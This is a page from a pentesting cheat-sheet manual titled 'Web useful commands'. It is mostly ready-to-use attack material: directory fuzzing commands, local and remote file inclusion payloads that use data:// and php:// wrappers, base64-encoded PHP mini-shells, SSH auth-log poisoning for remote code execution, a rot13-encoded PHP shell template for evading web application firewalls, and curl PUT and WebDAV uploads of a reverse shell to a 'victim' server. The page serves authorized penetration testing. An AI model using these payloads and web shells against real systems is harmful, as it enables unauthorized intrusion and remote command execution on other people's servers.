Joined Adversary Simulation Manual
  • Joined Adversary Simulation Manual
  • Reconnaissance
    • Active Scanning
    • Gather Victim Host Information
    • Gather Victim Identity Information
    • Gather Victim Network Information
    • Gather Victim Org Information
    • Phishing for Information
    • Search Closed Sources
    • Search Open Technical Databases
    • Search Open Websites/Domains
    • Search Victim-Owned Websites
  • Resource Development
    • Acquire Infrastructure
    • Compromise Accounts
    • Compromise Infrastructure
    • Develop Capabilities
    • Establish Accounts
    • Obtain Capabilities
  • Initial Access
    • Drive-by Compromise
      • WiFi Attacks
    • Exploit Public-Facing Application
    • External Remote Services
    • Hardware Additions
    • Phishing
    • Replication Through Removable Media
    • Supply Chain Compromise
    • Trusted Relationship
    • Valid Accounts
  • Execution
    • Command and Scripting Interpreter
    • Exploitation for Client Execution
    • Inter-Process Communication
    • Native API
    • Scheduled Task-Job
    • Shared Modules
    • Software Deployment Tools
    • System Services
    • User Execution
    • Windows Management Instrumentation
  • Persistence
    • Account Manipulation
    • BITS Jobs
    • Boot or Logon Autostart Execution
    • Boot or Logon Initialization Scripts
    • Browser Extensions
    • Compromise Client Software Binary
    • Create Account
    • Create or Modify System Process
    • Event Triggered Execution
    • External Remote Services
    • Hijack Execution Flow
    • Implant Container Image
    • Office Application Startup
    • Pre-OS Boot
    • Scheduled Task-Job
    • Server Software Component
    • Traffic Signaling
    • Valid Accounts
  • Privilege Escalation
    • Abuse Elevation Control Mechanism
    • Access Token Manipulation
    • Boot or Logon Autostart Execution
    • Boot or Logon Initialization Scripts
    • Create or Modify System Process
    • Event Triggered Execution
    • Exploitation for Privilege Escalation
    • Group Policy Modification
    • Hijack Execution Flow
    • Scheduled Task-Job
    • Process Injection
    • Valid Accounts
  • Defense Evasion
    • Abuse Elevation Control Mechanism
    • Access Token Manipulation
    • BITS Jobs
    • Deobfuscate-Decode Files or Information
    • Direct Volume Access
    • Execution Guardrails
    • Exploitation for Defense Evasion
    • File and Directory Permissions Modification
    • Group Policy Modification
    • Hide Artifacts
    • Hijack Execution Flow
    • Impair Defenses
    • Indicator Removal on Host
    • Indirect Command Execution
    • Masquerading
    • Modify Authentication Process
    • Modify Cloud Compute Infrastructure
    • Modify Registry
    • Modify System Image
    • Network Boundary Bridging
    • Obfuscated Files or Information
    • Pre-OS Boot
    • Process Injection
    • Rogue Domain Controller
    • Rootkit
    • Signed Binary Proxy Execution
    • Signed Script Proxy Execution
    • Subvert Trust Controls
    • Template Injection
    • Traffic Signaling
    • Trusted Developer Utilities Proxy Execution
    • Unused-Unsupported Cloud Regions
    • Use Alternate Authentication Material
    • Valid Accounts
    • Virtualization-Sandbox Evasion
    • Weaken Encryption
    • XSL Script Processing
  • Credential Access
    • Brute Force
    • Credentials from Password Stores
    • Exploitation for Credential Access
    • Forced Authentication
    • Input Capture
    • Man-in-the-Middle
    • Modify Authentication Process
    • Network Sniffing
    • OS Credential Dumping
    • Steal Application Access Token
    • Steal or Forge Kerberos Tickets
    • Steal Web Session Cookie
    • Two-Factor Authentication Interception
    • Unsecured Credentials
  • Discovery
    • Account Discovery
    • Application Window Discovery
    • Browser Bookmark Discovery
    • Cloud Infrastructure Discovery
    • Cloud Service Dashboard
    • Cloud Service Discovery
    • Cloud Trust Discovery
    • Domain Trust Discovery
    • File and Directory Discovery
    • Network Service Scanning
    • Network Share Discovery
    • Network Sniffing
    • Password Policy Discovery
    • Peripheral Device Discovery
    • Permission Groups Discovery
    • Process Discovery
    • Query Registry
    • Remote System Discovery
    • Software Discovery
    • System Information Discovery
    • System Network Configuration Discovery
    • System Network Connections Discovery
    • System Owner-User Discovery
    • System Service Discovery
    • System Time Discovery
    • Virtualization-Sandbox Evasion
  • Lateral Movement
    • Exploitation of Remote Services
    • Internal Spearphishing
    • Lateral Tool Transfer
    • Remote Service Session Hijacking
    • Remote Services
    • Replication Through Removable Media
    • Software Deployment Tools
    • Taint Shared Content
    • Use Alternate Authentication Material
  • Collection
    • Archive Collected Data
    • Audio Capture
    • Automated Collection
    • Clipboard Data
    • Data from Cloud Storage Object
    • Data from Configuration Repository
    • Data from Information Repositories
    • Data from Local System
    • Data from Network Shared Drive
    • Data from Removable Media
    • Data Staged
    • Email Collection
    • Input Capture
    • Man in the Browser
    • Man-in-the-Middle
    • Screen Capture
    • Video Capture
  • Command and Control
    • Application Layer Protocol
    • Communication Through Removable Media
    • Data Encoding
    • Data Obfuscation
    • Dynamic Resolution
    • Encrypted Channel
    • Fallback Channels
    • Ingress Tool Transfer
    • Multi-Stage Channels
    • Non-Application Layer Protocol
    • Non-Standard Port
    • Protocol Tunneling
    • Proxy
    • Remote Access Software
    • Traffic Signaling
    • Web Service
  • Exfiltration
    • Automated Exfiltration
    • Data Transfer Size Limits
    • Exfiltration Over Web Service
    • Exfiltration Over Alternative Protocol
    • Exfiltration Over C2 Channel
    • Exfiltration Over Other Network Medium
    • Exfiltration Over Physical Medium
    • Exfiltration Over Web Service
    • Scheduled Transfer
    • Transfer Data to Cloud Account
  • Impact
    • Account Access Removal
    • Data Destruction
    • Data Encrypted for Impact
    • Data Manipulation
    • Defacement
    • Disk Wipe
    • Endpoint Denial of Service
    • Firmware Corruption
    • Inhibit System Recovery
    • Network Denial of Service
    • Resource Hijacking
    • Service Stop
    • System Shutdown-Reboot
  • General Pentesting
    • Services
    • SSL related Commands
    • Web useful commands
    • Reverse Shells
    • DB related Commands
    • VLAN Attacks
    • AD Bruteforcing
    • JWT Attacks
  • Tricks
  • Tools
    • AD Tools
    • Mobile Tools
    • Tools
    • WiFi Tools
    • LAN Tools
    • LAN Tools
  • Contributors
  • Kudos, References and Further Reading
Powered by GitBook
On this page
  • Table of contents
  • Quick References
  • Fuzzing
  • Create wordlist
  • WAF detection
  • Upload Files
  • General Exploitation
  • LFI
  • RCE with LFI and SSH log poisoning
  • PHP shell WAF escape
  • Insecure Methods
  • Methods Testing
  • TRACE
  • PUT
  • References

Was this helpful?

  1. General Pentesting

Web useful commands

{: .no_toc }

Table of contents

{: .no_toc .text-delta }

  1. TOC

    {:toc}

Quick References

Fuzzing

dirb http://10.10.10.56 /usr/share/wordlists/dirb/big.txt -x /usr/share/wordlists/dirb/extensions_common.txt
dirb http://10.0.0.10 -X .htm,.html,.php
wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/All_attack.txt http://10.0.0.10/test.php?file=FUZZ

Create wordlist

cewl –w /root/Desktop/words.txt –m 6  https://example.com

WAF detection

wafw00f http://192.168.56.102

Upload Files

curl -u <username:password> -T file_to_upload <Target_URL>
curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>

General Exploitation

LFI

Simple RFI

page=data://text/plain, <?php system("whoami");?>

Base64 encoded RFI

page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ3aG9hbWkiKTs/Pg==
lang=php://filter/convert.base64-encode/resource=index

Mini shell

page=data://text/plain,<?php system($_GET[cmd]);?>&cmd=id

Base64 + URL encoded mini shell

page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOz8%2B&cmd=id

RCE with LFI and SSH log poisoning

From

  • https://www.hackingarticles.in/rce-with-lfi-and-ssh-log-poisoning

ssh '<?php system($_GET['c']); ?>'@192.168.0.23
http://192.168.1.129/lfi/lfi.php?file=/var/log/auth.log&c=id

PHP shell WAF escape

Urlencode and rot13 encode

<?php

$enc = <<<ENC
__ENCODED PHP SHELL HERE__
ENC;

assert(urldecode(str_rot13($enc)));
?>

Use

<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
<?php $c=$_GET[‘c’]; echo `$c`; ?>

Insecure Methods

Methods Testing

nc <IP>

HEAD / HTTP/1.0
OPTIONS / HTTP/1.0
PROPFIND / HTTP/1.0
TRACE / HTTP/1.1
PUT http://Target_URL/FILE_NAME
POST http://Target_URL/FILE_NAME HTTP/1.x

TRACE

telnet www.victim.com 80
> TRACE / HTTP/1.1
> Host: www.victim.com
curl -k -s -i -X TRACE https://IP -H "Cookies: Reflected"

PUT

curl http://192.168.40.130/test/ --upload-file /root/Desktop/curl.php -v

curl --upload-file php-reverse-shell.txt -v --url http://192.168.40.130/test/shell.php -0 --http1.0

curl -i -X PUT -H "Content-Type: application/xml; charset=utf-8" -d @"/tmp/some-file.xml" http://www.victim.com/newpage

curl -X PUT -d "text or data to put" http://www.victim.com/destination_page

curl -i -H "Accept: application/json" -X PUT -d "text or data to put" http://victim.com/new_page
cadaver http://<IP>/dav/
put /root/Desktop/shell.php

References

  • http://pentestmonkey.net

          White Papers
          Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
          Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
          Blind Security Testing - An Evolutionary Approach
          Command Injection in XML Signatures and Encryption
          Input Validation Cheat Sheet
          SQL Injection Cheat Sheet
PreviousSSL related CommandsNextReverse Shells

Last updated 4 years ago

Was this helpful?